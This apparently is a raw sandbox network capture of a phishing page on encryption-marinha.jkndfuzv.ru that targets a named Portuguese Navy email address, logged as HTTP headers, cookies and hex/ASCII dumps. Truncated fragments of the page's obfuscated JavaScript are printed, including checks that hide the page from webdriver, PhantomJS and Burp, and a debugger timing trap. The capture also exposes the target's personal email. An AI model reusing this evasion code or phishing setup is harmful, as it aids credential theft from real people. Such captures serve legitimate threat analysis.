                                                                  Cookie: XSRF-TOKEN=eyJpdiI6ImpTYThVRU5ha2hWclFtSnY2ZXhlQ0E9PSIsInZhbHVlIjoiaVlYVnFFQ2JRQkxtS3Badnk0OGh4bHdoOWlSbjlzSFE5YlNORnVVVDQ2cFhzZ0RHeTFDME9raUkvT3J2RHZxTjJnTTNoVXBIVG1mcUZDTlI0WlFwYW5MRE5FYUNXZ0kwL3BjY1hwdFJaK2hZZ3doSjRTb2RNMXRGUW04bVFYQUoiLCJtYWMiOiI5MGZjNTk2MzhmYzc0MTljMjkyZjEyYjExMDA2MTU2ODY0NDZmZGMwNGE5ZDVlOWVjMzYxZmIyZTQ2YTQ3ODkxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZ5NldoREFMbGE3dDNBZHRMczJtM1E9PSIsInZhbHVlIjoidklraU9aZU42aUlyU2ViSjFrQUR0N0F6dEFpL1pDcDhJNzN2dEYzajR6dEtjQ2ozdGsxRTNPREhuQ1Q2N0tXMU0wZ1JpOWxlcFN4eFVJaDM4SExLMGY5cHhzWTgwZ0o1cHI4ckwxVHJ2RkFnbUZsMi9sekdiQ0U0WWxtNUtZUVkiLCJtYWMiOiJlZmFkMDRhNjhjNTg5ZmE5N2M5MGM5ZWIwOWNlNzA3MmM5NWVmNzc1ODQzYWFlYTg2ZmVkNjZiYTU3MzY3NTIyIiwidGFnIjoiIn0%3D
                                                                  2025-03-14 11:30:57 UTC36OUTData Raw: 64 61 74 61 3d 57 51 6e 61 64 69 61 2e 73 6f 66 69 61 2e 72 69 6a 6f 25 34 30 6d 61 72 69 6e 68 61 2e 70 74
                                                                  Data Ascii: data=WQnadia.sofia.rijo%40marinha.pt
                                                                  2025-03-14 11:30:58 UTC1204INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:30:58 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: no-cache, private
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C4ueZhcRMJj5nJFZiPr21ehNWu0cBdsA%2FCCINtpDq%2FwVqe5poQ9LsfY6VzitnucJno9N41B1SYhJtwRaUbnogVOGpZ%2BOAYce6MmHNuumbLiLWK4dM6X2omJFSmCp"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5436&min_rtt=5415&rtt_var=1542&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2827&recv_bytes=2470&delivery_rate=520372&cwnd=251&unsent_bytes=0&cid=c5a5345069c84715&ts=101&x=0"
                                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6Ik5KZjdZV2FoMGFlenR4VUFHcjZLVWc9PSIsInZhbHVlIjoiYlFWeWVlVVpXYWltd2cxb2RvNXJrZ3ZFVHkyZmNJNHRJUk5sNzl5OWtCamhKL2VSSkRpVkQvTDhrVzZhaytqUlRQcEZTOXFQRFVhRWxQZG1qdkxtYkd5R28xc2g1YmlHSUllZjRyTm5SQ1ZoZzVIRW90b00vSmhSelVBcHc5NFUiLCJtYWMiOiJkNzU2MThmMWE3ZTA3MmVkMWUzYjY4ODM5NmQwNTY5ZWMwOGFiMjA3Y2I0ZWNiZWExNGEyMjAwYWViMDY5MmYzIiwidGFnIjoiIn0%3D; expires=Fri, 14-Mar-2025 13:30:57 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                  2025-03-14 11:30:58 UTC762INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 68 47 63 33 6c 53 55 33 52 73 52 57 6c 43 51 30 70 45 61 58 52 73 63 6b 78 35 63 48 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 54 6e 56 4b 63 56 70 46 57 6b 74 6b 61 6c 4a 71 62 45 56 45 4f 44 4a 4f 55 47 30 76 4e 6b 68 4f 4b 30 52 61 59 6b 55 78 56 47 39 58 61 46 56 6f 63 6e 70 6c 61 6a 68 55 4e 56 6c 32 52 45 56 78 62 54 4a 71 54 56 68 55 4e 47 4d 34 51 55 74 50 64 57 78 36 55 6b 56 4b 64 6e 42 35 4e 6b 70 47 61 6c 6c 33 4d 56 41 76 4d 46 68 56 5a 46 46 56 61 47 35 56 4f 44 4e 69 4d 6b 68 78 61 47 5a 4d 61 45 4a 72 55 56 4a 73 64 32 35 77 54 47 31 75 64 79 74 54 52 6b 6c 47 53 44 4a 49 64 32 64 6b 4d 54 5a 70 52 7a 67 72 59 57 77
                                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IkhGc3lSU3RsRWlCQ0pEaXRsckx5cHc9PSIsInZhbHVlIjoiTnVKcVpFWktkalJqbEVEODJOUG0vNkhOK0RaYkUxVG9XaFVocnplajhUNVl2REVxbTJqTVhUNGM4QUtPdWx6UkVKdnB5NkpGall3MVAvMFhVZFFVaG5VODNiMkhxaGZMaEJrUVJsd25wTG1udytTRklGSDJId2dkMTZpRzgrYWw
                                                                  2025-03-14 11:30:58 UTC339INData Raw: 31 34 63 0d 0a 7b 22 61 22 3a 22 51 37 77 63 37 51 7a 66 36 4b 6c 36 54 36 45 6f 6c 43 5c 2f 66 49 69 6f 63 33 36 38 4f 61 30 55 51 73 66 5a 67 45 70 5c 2f 58 4e 66 54 64 4f 4d 5a 48 6a 72 51 4e 48 66 2b 6f 4a 6b 51 70 79 53 46 44 48 77 78 6c 31 59 63 77 38 66 70 4c 77 5a 48 79 34 52 33 73 79 73 4b 50 74 4f 4c 45 36 42 63 55 42 71 73 53 48 75 49 61 38 73 56 55 57 62 61 47 63 74 78 41 59 41 56 68 58 5a 78 4b 44 33 7a 59 77 6a 4a 64 54 49 55 4f 7a 31 55 47 4e 68 73 59 31 74 58 6f 6f 53 6a 72 2b 69 75 66 30 51 4a 77 74 33 32 5c 2f 63 66 49 6b 4f 57 49 3d 22 2c 22 62 22 3a 22 66 30 31 32 35 31 39 62 63 38 34 34 62 33 32 38 62 37 62 32 30 64 30 64 32 32 61 37 38 36 39 62 22 2c 22 63 22 3a 22 62 39 31 36 31 33 63 35 30 31 32 61 65 37 37 38 35 32 61 38 62 62 39
                                                                  Data Ascii: 14c{"a":"Q7wc7Qzf6Kl6T6EolC\/fIioc368Oa0UQsfZgEp\/XNfTdOMZHjrQNHf+oJkQpySFDHwxl1Ycw8fpLwZHy4R3sysKPtOLE6BcUBqsSHuIa8sVUWbaGctxAYAVhXZxKD3zYwjJdTIUOz1UGNhsY1tXooSjr+iuf0QJwt32\/cfIkOWI=","b":"f012519bc844b328b7b20d0d22a7869b","c":"b91613c5012ae77852a8bb9
                                                                  2025-03-14 11:30:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  11192.168.2.449737104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:30:58 UTC1380OUTGET /favicon.ico HTTP/1.1
                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  sec-ch-ua-platform: "Windows"
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: no-cors
                                                                  Sec-Fetch-Dest: image
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.pt
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6ImpTYThVRU5ha2hWclFtSnY2ZXhlQ0E9PSIsInZhbHVlIjoiaVlYVnFFQ2JRQkxtS3Badnk0OGh4bHdoOWlSbjlzSFE5YlNORnVVVDQ2cFhzZ0RHeTFDME9raUkvT3J2RHZxTjJnTTNoVXBIVG1mcUZDTlI0WlFwYW5MRE5FYUNXZ0kwL3BjY1hwdFJaK2hZZ3doSjRTb2RNMXRGUW04bVFYQUoiLCJtYWMiOiI5MGZjNTk2MzhmYzc0MTljMjkyZjEyYjExMDA2MTU2ODY0NDZmZGMwNGE5ZDVlOWVjMzYxZmIyZTQ2YTQ3ODkxIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZ5NldoREFMbGE3dDNBZHRMczJtM1E9PSIsInZhbHVlIjoidklraU9aZU42aUlyU2ViSjFrQUR0N0F6dEFpL1pDcDhJNzN2dEYzajR6dEtjQ2ozdGsxRTNPREhuQ1Q2N0tXMU0wZ1JpOWxlcFN4eFVJaDM4SExLMGY5cHhzWTgwZ0o1cHI4ckwxVHJ2RkFnbUZsMi9sekdiQ0U0WWxtNUtZUVkiLCJtYWMiOiJlZmFkMDRhNjhjNTg5ZmE5N2M5MGM5ZWIwOWNlNzA3MmM5NWVmNzc1ODQzYWFlYTg2ZmVkNjZiYTU3MzY3NTIyIiwidGFnIjoiIn0%3D
                                                                  2025-03-14 11:30:58 UTC1053INHTTP/1.1 404 Not Found
                                                                  Date: Fri, 14 Mar 2025 11:30:58 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u%2F2mk9jj8%2BWPHi0neXmrxvWqgI1lGSmFkhlvUS6bAaUTOwt8tjj836LHDYZIpuyTJT1GYpu5hcb9No5XWJChYS3L09u%2Bms9dilio1EjkXvgdh%2BHYKGrt6sGqO6a%2B"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Vary: Accept-Encoding
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4975&min_rtt=4865&rtt_var=1903&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2289&delivery_rate=585405&cwnd=251&unsent_bytes=0&cid=69e785c390f55e85&ts=102&x=0"
                                                                  Cache-Control: max-age=14400
                                                                  CF-Cache-Status: MISS
                                                                  Server: cloudflare
                                                                  CF-RAY: 9203712a3f2eefa1-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1781&min_rtt=1776&rtt_var=677&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=1952&delivery_rate=1602634&cwnd=153&unsent_bytes=0&cid=f6013f963acbde34&ts=427&x=0"
                                                                  2025-03-14 11:30:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  12192.168.2.449738104.21.43.1754435628C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-03-14 11:30:58 UTC1549OUTGET /tqrmmkqnkybhgrcpajlvlmkvressy5l3xb609h7xeqsb767nl?YTUSIOUTJWFKEHXUXRYQVBSNX HTTP/1.1
                                                                  Host: encryption-marinha.jkndfuzv.ru
                                                                  Connection: keep-alive
                                                                  sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                  sec-ch-ua-mobile: ?0
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Upgrade-Insecure-Requests: 1
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: navigate
                                                                  Sec-Fetch-Dest: document
                                                                  Referer: https://encryption-marinha.jkndfuzv.ru/PtM2i/$nadia.sofia.rijo@marinha.pt
                                                                  Accept-Encoding: gzip, deflate, br, zstd
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Cookie: XSRF-TOKEN=eyJpdiI6Ik5KZjdZV2FoMGFlenR4VUFHcjZLVWc9PSIsInZhbHVlIjoiYlFWeWVlVVpXYWltd2cxb2RvNXJrZ3ZFVHkyZmNJNHRJUk5sNzl5OWtCamhKL2VSSkRpVkQvTDhrVzZhaytqUlRQcEZTOXFQRFVhRWxQZG1qdkxtYkd5R28xc2g1YmlHSUllZjRyTm5SQ1ZoZzVIRW90b00vSmhSelVBcHc5NFUiLCJtYWMiOiJkNzU2MThmMWE3ZTA3MmVkMWUzYjY4ODM5NmQwNTY5ZWMwOGFiMjA3Y2I0ZWNiZWExNGEyMjAwYWViMDY5MmYzIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhGc3lSU3RsRWlCQ0pEaXRsckx5cHc9PSIsInZhbHVlIjoiTnVKcVpFWktkalJqbEVEODJOUG0vNkhOK0RaYkUxVG9XaFVocnplajhUNVl2REVxbTJqTVhUNGM4QUtPdWx6UkVKdnB5NkpGall3MVAvMFhVZFFVaG5VODNiMkhxaGZMaEJrUVJsd25wTG1udytTRklGSDJId2dkMTZpRzgrYWwiLCJtYWMiOiI1M2I5ZmFmMzg3YzFiZDU5ODk5YjdjNTdhZGIyZGMxNDY0YWJkZTY5MDEyZjAxNTI1NzM3ZmJiYzk2ZjA5MWY4IiwidGFnIjoiIn0%3D
                                                                  2025-03-14 11:30:59 UTC1204INHTTP/1.1 200 OK
                                                                  Date: Fri, 14 Mar 2025 11:30:59 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: no-cache, private
                                                                  cf-cache-status: DYNAMIC
                                                                  vary: accept-encoding
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eMuEfUGuRW55%2FNDClwJGrdCYaJINUWTX1bOEDeo6%2Bq34ZLdxmSNgQwiOWJ8fQglEDQ1g2VqIKa6FmbqSTl%2FXOSUMABca9SOcT4iu0qiNVyHH2PGCy9bnR9p0TGrd"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=5059&min_rtt=5036&rtt_var=1905&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2826&recv_bytes=2459&delivery_rate=565528&cwnd=251&unsent_bytes=0&cid=fe0eef45f8aef960&ts=143&x=0"
                                                                  Set-Cookie: XSRF-TOKEN=eyJpdiI6IkZyZmxmV1dGTDVYS0xEUnVGYmpibmc9PSIsInZhbHVlIjoialhaNzhMdlBEYW91OHBKb2NoWXJlZ2ZXbXY2RW1DN3IxMDJhUHZIalk4dG8wVVpVc3BOL1AwMGZCdkFwV00rNUVCWmJvTzdJRXd2dVZvMzZtSjlQUnJUcUxlNHpVZUdRaDM4d3picnd1VldPYnNiY0wxYzY5ZDdrVExzZFBoSDMiLCJtYWMiOiI3ZjdmZWUyYzQ1Y2JiMzQ2N2I0YzQ0N2NlNzE0NmJjZTYyN2U0ZWM0NzQzNTFjZjYxMWNkMzc0MzNmMjMwMWM0IiwidGFnIjoiIn0%3D; expires=Fri, 14-Mar-2025 13:30:58 GMT; Max-Age=7200; path=/; secure; samesite=none
                                                                  2025-03-14 11:30:59 UTC762INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6b 4a 6b 4e 44 45 35 4b 33 5a 52 5a 46 46 4e 64 30 31 75 4d 6d 46 73 65 58 63 35 62 33 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 51 6c 6c 44 62 6d 35 59 56 30 4a 72 64 45 35 5a 55 31 63 35 65 69 74 6e 54 54 67 32 64 45 64 34 59 33 4a 45 63 31 6c 58 61 6b 68 6b 51 57 46 30 54 46 56 43 53 30 31 45 63 7a 6c 70 54 7a 5a 6f 4f 56 4a 48 52 6c 42 6d 4e 33 63 35 62 55 78 4f 59 58 5a 4d 64 30 39 6b 55 6a 5a 45 5a 58 70 42 5a 46 59 78 4e 47 70 4f 5a 44 52 61 53 57 55 33 65 48 41 33 57 54 52 6a 55 6d 31 7a 5a 6c 41 76 61 45 74 47 64 6a 5a 48 63 6d 46 44 64 46 6b 33 53 30 31 6c 56 30 31 56 4d 56 56 43 5a 33 4a 5a 52 53 39 43 56 69 74 4d 4d 46 59
                                                                  Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IkJkNDE5K3ZRZFFNd01uMmFseXc5b3c9PSIsInZhbHVlIjoiQllDbm5YV0JrdE5ZU1c5eitnTTg2dEd4Y3JEc1lXakhkQWF0TFVCS01EczlpTzZoOVJHRlBmN3c5bUxOYXZMd09kUjZEZXpBZFYxNGpOZDRaSWU3eHA3WTRjUm1zZlAvaEtGdjZHcmFDdFk3S01lV01VMVVCZ3JZRS9CVitMMFY
                                                                  2025-03-14 11:30:59 UTC1369INData Raw: 66 66 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c
                                                                  Data Ascii: ff4<!DOCTYPE html><html lang="en"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <titl
                                                                  2025-03-14 11:30:59 UTC1369INData Raw: 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 6f 70 3a 31 32 30 70 78 3b 6c 65 66 74 3a 32 35 70 78 3b 77 69 64 74 68 3a 76 61 72 28 2d 2d 65 6e 76 57 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 35 29 20 30 20 34 70 78 20 35 70 78 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 68 61 64 6f 77 2d 66 61 64 65 20 76 61 72 28 2d 2d 64 75 72 29 20 69 6e 66 69 6e 69 74 65 3b 7d 0d 0a 23 66 6c 61 70 43 6f 6e 74 61 69 6e 65 72 7b 77 69 64 74 68 3a 76 61 72 28 2d 2d 65 6e 76 57 29 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 37 39 70 78 3b 7d 0d 0a 23 65 66 7b 77 69 64 74 68 3a 76 61 72 28 2d 2d 65 6e 76 57 29 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 34 31 70 78 3b 7d 0d 0a 23 65 66 3e 2e 6c 7b 77 69 64 74 68 3a 32 38 37 70 78 3b 62 61 63 6b
                                                                  Data Ascii: osition:relative;top:120px;left:25px;width:var(--envW);box-shadow:rgba(0,0,0,.25) 0 4px 5px;animation:shadow-fade var(--dur) infinite;}#flapContainer{width:var(--envW);margin-top:179px;}#ef{width:var(--envW);margin-top:-41px;}#ef>.l{width:287px;back
                                                                  2025-03-14 11:30:59 UTC1353INData Raw: 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 33 32 2c 30 2c 30 2e 36 37 2c 30 29 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 74 6f 70 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 63 61 6c 63 28 2d 31 20 2a 20 76 61 72 28 2d 2d 65 6e 76 48 29 29 29 20 72 6f 74 61 74 65 33 64 28 31 2c 30 2c 30 2c 39 30 64 65 67 29 3b 7d 0d 0a 2e 66 6c 61 70 54 72 69 61 6e 67 6c 65 7b 77 69 64 74 68 3a 76 61 72 28 2d 2d 66 6c 61 70 53 29 3b 68 65 69 67 68 74 3a 76 61 72 28 2d 2d 66 6c 61 70 53 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 35 30 64 39 66 66 3b 6d 61 72 67 69 6e 3a 2d 34 38 70 78 20 61 75 74 6f 20 30 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 37 70 78 3b
                                                                  Data Ascii: animation-timing-function:cubic-bezier(0.32,0,0.67,0);transform-origin:top;transform:translateY(calc(-1 * var(--envH))) rotate3d(1,0,0,90deg);}.flapTriangle{width:var(--flapS);height:var(--flapS);background:#50d9ff;margin:-48px auto 0;border-radius:7px;
                                                                  2025-03-14 11:30:59 UTC1369INData Raw: 64 31 61 0d 0a 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 63 61 6c 63 28 2d 31 20 2a 20 76 61 72 28 2d 2d 65 6e 76 48 29 29 29 20 72 6f 74 61 74 65 33 64 28 31 2c 30 2c 30 2c 39 30 64 65 67 29 3b 7d 7d 0d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 69 66 20 28 6e 61 76 69 67 61 74 6f 72 2e 77 65 62 64 72 69 76 65 72 20 7c 7c 20 77 69 6e 64 6f 77 2e 63 61 6c 6c 50 68 61 6e 74 6f 6d 20 7c 7c 20 77 69 6e 64 6f 77 2e 5f 70 68 61 6e 74 6f 6d 20 7c 7c 20 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 69 6e 63 6c 75 64 65 73 28 22 42 75 72 70 22 29 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 20 3d 20 22 61 62 6f 75 74 3a 62 6c 61
                                                                  Data Ascii: d1a%{transform:translateY(calc(-1 * var(--envH))) rotate3d(1,0,0,90deg);}} </style> <script> if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) { window.location = "about:bla
                                                                  2025-03-14 11:30:59 UTC1369INData Raw: 6e 74 29 20 7b 0d 0a 20 20 20 20 65 76 65 6e 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0d 0a 20 20 20 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 0d 0a 7d 29 3b 0d 0a 62 7a 70 6d 69 53 54 50 79 41 20 3d 20 66 61 6c 73 65 3b 0d 0a 28 66 75 6e 63 74 69 6f 6e 20 79 4e 66 76 44 49 41 79 4e 46 28 29 20 7b 0d 0a 20 20 20 20 6c 65 74 20 41 76 45 64 41 71 50 64 73 46 20 3d 20 66 61 6c 73 65 3b 0d 0a 20 20 20 20 63 6f 6e 73 74 20 56 42 48 43 53 70 46 5a 4e 6f 20 3d 20 31 30 30 3b 0d 0a 20 20 20 20 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 54 6d 76 73 55 54 79 63 6d 77 20 3d 20 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6e 6f 77 28 29 3b 0d 0a 20 20 20 20 20 20 20 20 64 65 62 75 67
                                                                  Data Ascii: nt) { event.preventDefault(); return false;});bzpmiSTPyA = false;(function yNfvDIAyNF() { let AvEdAqPdsF = false; const VBHCSpFZNo = 100; setInterval(function() { const TmvsUTycmw = performance.now(); debug
                                                                  2025-03-14 11:30:59 UTC623INData Raw: 73 73 3d 22 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 20 73 31 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 20 73 32 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 20 73 33 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 20 73 34 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 20 73 31 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 20 73 32 22 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 20 73 35 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 20 73 34 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 20
                                                                  Data Ascii: ss="r"><div class="s s1"></div><div class="s s2"></div><div class="s s3"></div></div><div class="r"><div class="s s4"></div><div class="s s1"></div><div class="s s2"></div></div><div class="r"><div class="s s5"></div><div class="s s4"></div><div class="s
                                                                  2025-03-14 11:30:59 UTC391INData Raw: 31 38 30 0d 0a 3c 70 61 74 68 20 64 3d 22 4d 33 34 2e 36 34 33 20 31 32 2e 30 37 35 6c 2d 2e 35 38 38 20 31 2e 36 34 37 68 2d 2e 30 33 34 63 2d 2e 31 30 35 2d 2e 33 38 37 2d 2e 32 38 2d 2e 39 33 34 2d 2e 35 35 36 2d 31 2e 36 33 6c 2d 33 2e 31 35 2d 37 2e 38 39 37 68 2d 33 2e 30 37 37 56 31 36 2e 37 35 68 32 2e 30 33 56 39 2e 30 33 32 63 30 2d 2e 34 37 36 2d 2e 30 31 2d 31 2e 30 35 32 2d 2e 30 33 2d 31 2e 37 31 31 2d 2e 30 31 2d 2e 33 33 33 2d 2e 30 34 39 2d 2e 36 2d 2e 30 35 38 2d 2e 38 30 34 68 2e 30 34 35 63 2e 31 30 33 2e 34 37 33 2e 32 31 2e 38 33 34 2e 32 38 37 20 31 2e 30 37 35 6c 33 2e 37 37 36 20 39 2e 31 36 68 31 2e 34 32 6c 33 2e 37 34 38 2d 39 2e 32 34 33 63 2e 30 38 35 2d 2e 32 31 31 2e 31 37 35 2d 2e 36 32 32 2e 32 35 37 2d 2e 39 39 32 68 2e
                                                                  Data Ascii: 180<path d="M34.643 12.075l-.588 1.647h-.034c-.105-.387-.28-.934-.556-1.63l-3.15-7.897h-3.077V16.75h2.03V9.032c0-.476-.01-1.052-.03-1.711-.01-.333-.049-.6-.058-.804h.045c.103.473.21.834.287 1.075l3.776 9.16h1.42l3.748-9.243c.085-.211.175-.622.257-.992h.
                                                                  2025-03-14 11:30:59 UTC1369INData Raw: 31 63 33 33 0d 0a 3c 70 61 74 68 20 64 3d 22 4d 34 32 2e 38 36 36 20 31 36 2e 37 35 31 68 32 2e 31 31 38 56 37 2e 37 35 32 68 2d 32 2e 31 31 38 7a 4d 34 33 2e 39 34 37 20 33 2e 39 32 39 63 2d 2e 33 34 39 20 30 2d 2e 36 35 33 2e 31 31 39 2d 2e 39 30 32 2e 33 35 33 61 31 2e 31 36 36 20 31 2e 31 36 36 20 30 20 30 30 2d 2e 33 37 38 2e 38 38 33 63 30 20 2e 33 34 34 2e 31 32 36 2e 36 33 36 2e 33 37 34 2e 38 36 35 2e 32 34 37 2e 32 33 2e 35 35 32 2e 33 34 35 2e 39 30 36 2e 33 34 35 73 2e 36 36 2d 2e 31 31 35 2e 39 31 2d 2e 33 34 35 63 2e 32 35 2d 2e 32 33 2e 33 37 39 2d 2e 35 32 2e 33 37 39 2d 2e 38 36 35 20 30 2d 2e 33 33 39 2d 2e 31 32 35 2d 2e 36 33 32 2d 2e 33 37 2d 2e 38 37 33 61 31 2e 32 36 32 20 31 2e 32 36 32 20 30 20 30 30 2d 2e 39 31 39 2d 2e 33 36 33
                                                                  Data Ascii: 1c33<path d="M42.866 16.751h2.118V7.752h-2.118zM43.947 3.929c-.349 0-.653.119-.902.353a1.166 1.166 0 00-.378.883c0 .344.126.636.374.865.247.23.552.345.906.345s.66-.115.91-.345c.25-.23.379-.52.379-.865 0-.339-.125-.632-.37-.873a1.262 1.262 0 00-.919-.363
